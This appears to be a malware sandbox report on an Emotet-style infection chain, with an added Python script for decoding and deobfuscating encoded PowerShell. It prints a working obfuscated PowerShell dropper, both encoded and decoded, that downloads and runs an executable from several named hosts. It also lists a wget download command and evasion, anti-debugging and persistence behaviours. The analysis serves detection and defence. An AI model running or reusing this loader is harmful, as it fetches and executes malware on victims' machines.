Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERsheLL -e JABDAGIAdwBkAHoAcQB4AGgAeAB6AGEAZwA9ACcAUAB0AGYAdQBpAGoAdABrAHUAJwA7ACQATAB0AHoAZwB6AGQAYgB6AG0AbQBoAHIAbgAgAD0AIAAnADUANAA2ACcAOwAkAEQAYwBmAGcAeABiAHUAZQBmAGUAdwB4AD0AJwBPAG0AYgBnAHkAeABxAHIAeAAnADsAJABUAGMAcAByAG8AbwBwAHIAegBoAGcAcwBiAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABMAHQAegBnAHoAZABiAHoAbQBtAGgAcgBuACsAJwAuAGUAeABlACcAOwAkAFcAZgBvAGIAcgBoAGgAaQA9ACcAVQBjAHIAYwB5AGwAaABjAGsAdwBpACcAOwAkAEwAdgBxAGIAbQBvAGgAeQBvAGkAdABzAD0AJgAoACcAbgBlAHcALQBvAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABOAGUAdAAuAHcARQBiAGMATABJAEUAbgB0ADsAJABDAGoAYwBzAHQAbQB6AGwAbwBxAD0AJwBoAHQAdABwADoALwAvAGgAbwBtAGUALgBtAHUANAB2AGkAZQB0AC4AbgBlAHQALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBoAGQAZABnADAALwAqAGgAdAB0AHAAOgAvAC8AZABlAG0AbwAuAHQAdQB6AGwAYQBwAGEAcwBsAGEAbgBtAGEAegAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AcwBqADMAMwAvACoAaAB0AHQAcAA6AC8ALwBjAG8AYQBsAGkAdABpAG8AbgBiAGEAeQAuAGMAbwBtAC8AbgB5AHMAcgBpAC8AaQBpAEkALwAqAGgAdAB0AHAAcwA6AC8ALwBqAGUAYgBrAGgAYQB0AGEALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvADgAbAA4AHkAZAA3AC8AKgBoAHQAdABwAHMAOgAvAC8AYgBpAGcAZABhAHQAYQBwAHIAbwBmAGkAbABlAC4AYwBvAG0ALwBkADgAYgBoAGcALwA3AG0AZgAvACcALgAiAFMAYABQAEwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAVQBoAGkAbgBwAHkAYgBtAD0AJwBEAGEAdwBmAGMAbgB4AG8AcABvACcAOwBmAG8AcgBlAGEAYwBoACgAJABQAHYAbABnAHIAZgB1AG4AagBhACAAaQBuACAAJABDAGoAYwBzAHQAbQB6AGwAbwBxACkAewB0AHIAeQB7ACQATAB2AHEAYgBtAG8AaAB5AG8AaQB0AHMALgAiAEQATwB3AGAATgBMAE8AYQBEAGAARgBJAEwARQAiACgAJABQAHYAbABnAHIAZgB1AG4AagBhACwAIAAkAFQAYwBwAHIAbwBvAHAAcgB6AGgAZwBzAGIAKQA7ACQASgBrAGUAegBsAGoAbwBtAHcAdQB5AGQAPQAnAEoAdABzAGoAaABiAG8AcQBuAGIAYwBnACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAVABjAHAAcgBvAG8AcAByAHoAaABnAHMAYgApAC4AIgBMAEUATgBHAGAAVABIACIAIAAtAGcAZQAgADIAMwA1ADEAMQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwBgAFIARQBBAFQARQAiACgAJABUAGMAcAByAG8AbwBwAHIAegBoAGcAcwBiACkAOwAkAEgAcwBrAGkAegB5AHgAagBwAG4AcwA9ACcAUABqAGMAcwBsAGgAZABkAHcAZgBnAHMAJwA7AGIAcgBlAGEAawA7ACQAVwBjAHgAZgBlAHkAegBwAGIAbgB2AHQAPQAnAEsAYwB3AHAAYwB2AGIAZQB6AGsAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATQBqAGwAbgBkAHEAdQBmAGEAZwBzAGkAbgA9ACcAWgBoAG8AdwBzAGwAcgB0AHQAaQByAHAAJwA=
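The -e argument is the base64 form of a UTF-16LE script, so the blob above is recoverable offline; decoded, it is the usual Emotet first stage: a list of download URLs kept in one string literal and split on the character [char]42 ('*'), a Net.WebClient DownloadFile into $env:userprofile\546.exe (the file recorded under "Powershell drops PE file"), a minimum-length check on the result, and a launch through the WMI Win32_Process class (the Win32_Process::Create call recorded for powershell.exe). The cmdlet names are hidden by string concatenation (&('new-obje'+'c'+'t')) and the method names by backticks and mixed case ("DOw`NLOaD`FILE"), which is what the PowerShell_Case_Anomaly rule keys on. The Python below is an added example, not part of the Joe Sandbox report, and it serves both this signature and "Malicious encrypted Powershell command line found" above: it encodes a short constructed script of the same shape (placeholder .invalid hosts, not the page's URLs), decodes it the way PowerShell does, strips the two obfuscation tricks and pulls the URL list out, so the same functions can be pointed at the real blob copied from this page.

```python
import base64
import re

# Constructed sample in the same shape as the page's "-e" command line
# (concatenated cmdlet names, backtick-split member names, one '*'-separated
# URL literal). The hosts are placeholders, not the report's indicators.
SAMPLE_SCRIPT = (
    "$Abc='x';$Dst=$env:userprofile+'\\'+'546'+'.exe';"
    "$Wc=&('new-obje'+'c'+'t') Net.wEbcLIEnt;"
    "$Urls='http://example-one.invalid/wp-includes/a1/"
    "*https://example-two.invalid/wp-admin/b2/'.\"S`PLIt\"([char]42);"
    "foreach($U in $Urls){try{$Wc.\"DOw`NLOaD`FILE\"($U, $Dst);"
    "If ((.('Get-I'+'tem') $Dst).\"LENG`TH\" -ge 23511) "
    "{([wmiclass]'win32_Process').\"c`REATE\"($Dst);break}}catch{}}"
)


def encode_powershell_command(script: str) -> str:
    """What 'powershell -e' expects: the script as UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(blob: str) -> str:
    """Reverse of -EncodedCommand. Whitespace (a blob broken across lines in a
    report, as above) is dropped and lost '=' padding is restored first."""
    clean = re.sub(r"\s+", "", blob)
    clean += "=" * (-len(clean) % 4)
    return base64.b64decode(clean).decode("utf-16-le")


def deobfuscate(script: str) -> str:
    """Undo the cheap tricks in this family of loaders:
    - backticks and mixed case inside quoted member names ("DOw`NLOaD`FILE");
    - 'a'+'b'+'c' concatenation of cmdlet names and paths;
    - the &('name') / .('name') call-operator wrappers around them.
    Member names are lower-cased (PowerShell is case-insensitive); URLs and
    other literals keep their case."""
    script = re.sub(r'\."([A-Za-z`]+)"',
                    lambda m: "." + m.group(1).replace("`", "").lower(), script)
    concat = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    while concat.search(script):
        script = concat.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
    return re.sub(r"[&.]\('([^']+)'\)", r"\1", script)


def extract_payload_urls(script: str) -> list:
    """The download list is one single-quoted literal split on [char]42 ('*');
    return its members from either the raw or the deobfuscated script."""
    urls = []
    for literal in re.findall(r"'([^']*)'", script):
        if "://" in literal:
            urls.extend(u for u in literal.split("*") if u)
    return urls


if __name__ == "__main__":
    blob = encode_powershell_command(SAMPLE_SCRIPT)
    print(deobfuscate(decode_powershell_command(blob)))
    print(extract_payload_urls(decode_powershell_command(blob)))
```

To work the real thing, paste the blob from the line above into decode_powershell_command; the whitespace stripping is there precisely because reports and tickets wrap it. Block the extracted hosts at the proxy and hunt for the drop path, not for the blob itself, since the variable names and the split character are regenerated per campaign.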
Contains functionality to dynamically determine API calls
Source: C:\Users\user\546.exe | Code function: 11_2_00438EC2 GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\546.exe | Code function: 11_2_004204FF push ecx; ret 11_2_0042050F
Source: C:\Users\user\546.exe | Code function: 12_2_004204FF push ecx; ret 12_2_0042050F
Source: C:\Users\user\546.exe | Code function: 12_2_0041F8C0 push eax; ret 12_2_0041F8D4
Source: C:\Users\user\546.exe | Code function: 12_2_0041F8C0 push eax; ret 12_2_0041F8FC
Source: C:\Users\user\546.exe | Code function: 12_2_0041FBF8 push eax; ret 12_2_0041FC16
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 13_2_00E0E51D push cs; ret 13_2_00E0E55E
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 14_2_00F6E51D push cs; ret 14_2_00F6E55E

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\SysWOW64\driverthunk.exe | Executable created and started: C:\Windows\SysWOW64\driverthunk.exe
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\546.exe
Drops PE files to the user directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\546.exe
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\546.exe | PE file moved: C:\Windows\SysWOW64\driverthunk.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\546.exe
Contains functionality to start windows services
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 14_2_00F8CF58 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\546.exe | File opened: C:\Windows\SysWOW64\driverthunk.exe:Zone.Identifier read attributes | delete
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\546.exe | Code function: 11_2_0044617C GetParent,GetParent,IsIconic,GetParent
Source: C:\Users\user\546.exe | Code function: 11_2_0040E584 IsIconic,GetWindowPlacement,GetWindowRect
Source: C:\Users\user\546.exe | Code function: 11_2_00451505 IsWindowVisible,IsIconic
Source: C:\Users\user\546.exe | Code function: 12_2_0044617C GetParent,GetParent,IsIconic,GetParent
Source: C:\Users\user\546.exe | Code function: 12_2_0040E584 IsIconic,GetWindowPlacement,GetWindowRect
Source: C:\Users\user\546.exe | Code function: 12_2_00451505 IsWindowVisible,IsIconic
Source: C:\Users\user\546.exe | Code function: 12_2_004498FE __EH_prolog,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA
Source: C:\Users\user\546.exe | Code function: 12_2_0040BD80 IsIconic
Source: C:\Users\user\546.exe | Code function: 12_2_0040BE00 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\546.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\driverthunk.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)
Source: C:\Windows\SysWOW64\driverthunk.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Contains functionality to enumerate running services
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle, 14_2_00F8CCBC
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3185
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 716
Found evasive API chain (date check)
Source: C:\Users\user\546.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_11-33344
Found large amount of non-executed APIs
Source: C:\Users\user\546.exe | API coverage: 2.2 %
Source: C:\Users\user\546.exe | API coverage: 1.8 %
Source: C:\Windows\SysWOW64\driverthunk.exe | API coverage: 9.9 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5308 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2036 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5352 | Thread sleep time: -922337203685477s >= -30000s
Checks the free space of harddrives
Source: C:\Users\user\546.exe | File Volume queried: C:\ FullSizeInformation
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\546.exe | Code function: 11_2_00442282 lstrlenA,FindFirstFileA,FindClose, 11_2_00442282
Source: C:\Users\user\546.exe | Code function: 12_2_00442282 lstrlenA,FindFirstFileA,FindClose, 12_2_00442282
Source: C:\Users\user\546.exe | Code function: 12_2_004417BA __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA, 12_2_004417BA
Contains functionality to query system information
Source: C:\Users\user\546.exe | Code function: 11_2_0041F6CF VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect, 11_2_0041F6CF
Program exit points
Source: C:\Windows\SysWOW64\driverthunk.exe | API call chain: ExitProcess graph end node
Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\546.exe | Code function: 11_2_00438EC2 GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary, 11_2_00438EC2
Contains functionality to read the PEB
Source: C:\Users\user\546.exe | Code function: 12_2_0040B930 mov eax, dword ptr fs:[00000030h] 12_2_0040B930
Source: C:\Users\user\546.exe | Code function: 12_2_0040BA70 mov eax, dword ptr fs:[00000030h] 12_2_0040BA70
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 13_2_00E00467 mov eax, dword ptr fs:[00000030h] 13_2_00E00467
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 13_2_00E00C0C mov eax, dword ptr fs:[00000030h] 13_2_00E00C0C
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 13_2_00E01743 mov eax, dword ptr fs:[00000030h] 13_2_00E01743
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 13_2_00E212CD mov eax, dword ptr fs:[00000030h] 13_2_00E212CD
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 13_2_00E21E04 mov eax, dword ptr fs:[00000030h] 13_2_00E21E04
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 14_2_00F60467 mov eax, dword ptr fs:[00000030h] 14_2_00F60467
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 14_2_00F60C0C mov eax, dword ptr fs:[00000030h] 14_2_00F60C0C
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 14_2_00F61743 mov eax, dword ptr fs:[00000030h] 14_2_00F61743
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 14_2_00F812CD mov eax, dword ptr fs:[00000030h] 14_2_00F812CD
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 14_2_00F81E04 mov eax, dword ptr fs:[00000030h] 14_2_00F81E04
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 13_2_00E214F2 GetProcessHeap,RtlAllocateHeap, 13_2_00E214F2
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Contains functionality to register its own exception handler
Source: C:\Users\user\546.exe | Code function: 11_2_00423FA0 SetUnhandledExceptionFilter, 11_2_00423FA0
Source: C:\Users\user\546.exe | Code function: 12_2_00423FA0 SetUnhandledExceptionFilter, 12_2_00423FA0

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found
Source: unknown | Process created: Base64 decoded $Cbwdzqxhxzag='Ptfuijtku';$Ltzgzdbzmmhrn = '546';$Dcfgxbuefewx='Ombgyxqrx';$Tcprooprzhgsb=$env:userprofile+'\'+$Ltzgzdbzmmhrn+'.exe';$Wfobrhhi='Ucrcylhckwi';$Lvqbmohyoits=&('new-obje'+'c'+'t') Net.wEbcLIEnt;$Cjcstmzloq='http://home.mu4viet.net/wp-includes/hddg0/*http://demo.tuzlapaslanmaz.com/wp-admin/sj33/*http://coalitionbay.com/nysri/iiI/*https://jebkhata.com/wp-includes/8l8yd7/*https://bigdataprofile.com/d8bhg/7mf/'."S`PLIt"([char]42);$Uhinpybm='Dawfcnxopo';foreach($Pvlgrfunja in $Cjcstmzloq){try{$Lvqbmohyoits."DOw`NLOaD`FILE"($Pvlgrfunja, $Tcprooprzhgsb);$Jkezljomwuyd='Jtsjhboqnbcg';If ((.('Get-I'+'tem') $Tcprooprzhgsb)."LENG`TH" -ge 23511) {([wmiclass]'win32_Process')."c`REATE"($Tcprooprzhgsb);$Hskizyxjpns='Pjcslhddwfgs';break;$Wcxfeyzpbnvt='Kcwpcvbezk'}}catch{}}$Mjlndqufagsin='Zhowslrttirp'
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'https://wentworthfallspots.com.au/wp-admin/balance/umn13rj63723324176254991zxuou9yb4im7n3520k'
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown | Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'https://wentworthfallspots.com.au/wp-admin/balance/umn13rj63723324176254991zxuou9yb4im7n3520k'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERsheLL -e JABDAGIAdwBkAHoAcQB4AGgAeAB6AGEAZwA9ACcAUAB0AGYAdQBpAGoAdABrAHUAJwA7ACQATAB0AHoAZwB6AGQAYgB6AG0AbQBoAHIAbgAgAD0AIAAnADUANAA2ACcAOwAkAEQAYwBmAGcAeABiAHUAZQBmAGUAdwB4AD0AJwBPAG0AYgBnAHkAeABxAHIAeAAnADsAJABUAGMAcAByAG8AbwBwAHIAegBoAGcAcwBiAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABMAHQAegBnAHoAZABiAHoAbQBtAGgAcgBuACsAJwAuAGUAeABlACcAOwAkAFcAZgBvAGIAcgBoAGgAaQA9ACcAVQBjAHIAYwB5AGwAaABjAGsAdwBpACcAOwAkAEwAdgBxAGIAbQBvAGgAeQBvAGkAdABzAD0AJgAoACcAbgBlAHcALQBvAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABOAGUAdAAuAHcARQBiAGMATABJAEUAbgB0ADsAJABDAGoAYwBzAHQAbQB6AGwAbwBxAD0AJwBoAHQAdABwADoALwAvAGgAbwBtAGUALgBtAHUANAB2AGkAZQB0AC4AbgBlAHQALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBoAGQAZABnADAALwAqAGgAdAB0AHAAOgAvAC8AZABlAG0AbwAuAHQAdQB6AGwAYQBwAGEAcwBsAGEAbgBtAGEAegAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AcwBqADMAMwAvACoAaAB0AHQAcAA6AC8ALwBjAG8AYQBsAGkAdABpAG8AbgBiAGEAeQAuAGMAbwBtAC8AbgB5AHMAcgBpAC8AaQBpAEkALwAqAGgAdAB0AHAAcwA6AC8ALwBqAGUAYgBrAGgAYQB0AGEALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvADgAbAA4AHkAZAA3AC8AKgBoAHQAdABwAHMAOgAvAC8AYgBpAGcAZABhAHQAYQBwAHIAbwBmAGkAbABlAC4AYwBvAG0ALwBkADgAYgBoAGcALwA3AG0AZgAvACcALgAiAFMAYABQAEwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAVQBoAGkAbgBwAHkAYgBtAD0AJwBEAGEAdwBmAGMAbgB4AG8AcABvACcAOwBmAG8AcgBlAGEAYwBoACgAJABQAHYAbABnAHIAZgB1AG4AagBhACAAaQBuACAAJABDAGoAYwBzAHQAbQB6AGwAbwBxACkAewB0AHIAeQB7ACQATAB2AHEAYgBtAG8AaAB5AG8AaQB0AHMALgAiAEQATwB3AGAATgBMAE8AYQBEAGAARgBJAEwARQAiACgAJABQAHYAbABnAHIAZgB1AG4AagBhACwAIAAkAFQAYwBwAHIAbwBvAHAAcgB6AGgAZwBzAGIAKQA7ACQASgBrAGUAegBsAGoAbwBtAHcAdQB5AGQAPQAnAEoAdABzAGoAaABiAG8AcQBuAGIAYwBnACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAVABjAHAAcgBvAG8AcAByAHoAaABnAHMAYgApAC4AIgBMAEUATgBHAGAAVABIACIAIAAtAGcAZQAgADIAMwA1ADEAMQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwBgAFIARQBBAFQARQAiACgAJABUAGMAcAByAG8AbwBwAHIAegBoAGcAcwBiACkAOwAkAEgA
cwBrAGkAegB5AHgAagBwAG4AcwA9ACcAUABqAGMAcwBsAGgAZABkAHcAZgBnAHMAJwA7AGIAcgBlAGEAawA7ACQAVwBjAHgAZgBlAHkAegBwAGIAbgB2AHQAPQAnAEsAYwB3AHAAYwB2AGIAZQB6AGsAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATQBqAGwAbgBkAHEAdQBmAGEAZwBzAGkAbgA9ACcAWgBoAG8AdwBzAGwAcgB0AHQAaQByAHAAJwA=
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'https://wentworthfallspots.com.au/wp-admin/balance/umn13rj63723324176254991zxuou9yb4im7n3520k'

Language, Device and Operating System Detection:
Contains functionality to query locale information (e.g. system language)
Source: C:\Users\user\546.exe | Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar | 11_2_0043040A
Source: C:\Users\user\546.exe | Code function: GetLocaleInfoA,MultiByteToWideChar | 11_2_004304C6
Source: C:\Users\user\546.exe | Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA | 11_2_0043053A
Source: C:\Users\user\546.exe | Code function: GetLocaleInfoW,WideCharToMultiByte | 11_2_004305ED
Source: C:\Users\user\546.exe | Code function: GetLocaleInfoA | 11_2_0042E6F5
Source: C:\Users\user\546.exe | Code function: GetLocaleInfoA,_strncpy | 11_2_0042C932
Source: C:\Users\user\546.exe | Code function: _strlen,EnumSystemLocalesA | 11_2_0042CE51
Source: C:\Users\user\546.exe | Code function: _strlen,_strlen,EnumSystemLocalesA | 11_2_0042CE88
Source: C:\Users\user\546.exe | Code function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,_strcat | 11_2_0042CF63
Source: C:\Users\user\546.exe | Code function: _strlen,EnumSystemLocalesA | 11_2_0042CF0E
Source: C:\Users\user\546.exe | Code function: GetThreadLocale,GetLocaleInfoA,GetACP | 11_2_004010A0
Source: C:\Users\user\546.exe | Code function: lstrcpyA,LoadLibraryA,GetLocaleInfoA | 11_2_0045515B
Source: C:\Users\user\546.exe | Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar | 12_2_0043040A
Source: C:\Users\user\546.exe | Code function: GetLocaleInfoA,MultiByteToWideChar | 12_2_004304C6
Source: C:\Users\user\546.exe | Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA | 12_2_0043053A
Source: C:\Users\user\546.exe | Code function: GetLocaleInfoW,WideCharToMultiByte | 12_2_004305ED
Source: C:\Users\user\546.exe | Code function: GetLocaleInfoA | 12_2_0042E6F5
Source: C:\Users\user\546.exe | Code function: GetLocaleInfoA,_strncpy | 12_2_0042C932
Source: C:\Users\user\546.exe | Code function: _strlen,EnumSystemLocalesA | 12_2_0042CE51
Source: C:\Users\user\546.exe | Code function: _strlen,_strlen,EnumSystemLocalesA | 12_2_0042CE88
Source: C:\Users\user\546.exe | Code function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,_strcat | 12_2_0042CF63
Source: C:\Users\user\546.exe | Code function: _strlen,EnumSystemLocalesA | 12_2_0042CF0E
Source: C:\Users\user\546.exe | Code function: GetThreadLocale,GetLocaleInfoA,GetACP | 12_2_004010A0
Source: C:\Users\user\546.exe | Code function: lstrcpyA,LoadLibraryA,GetLocaleInfoA | 12_2_0045515B
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\546.exe | Code function: 11_2_00429505 cpuid | 11_2_00429505
Queries the volume information (name, serial number etc.) of a device
Source: C:\Windows\SysWOW64\wget.exe | Queries volume information: C:\Users\user\Desktop\download VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
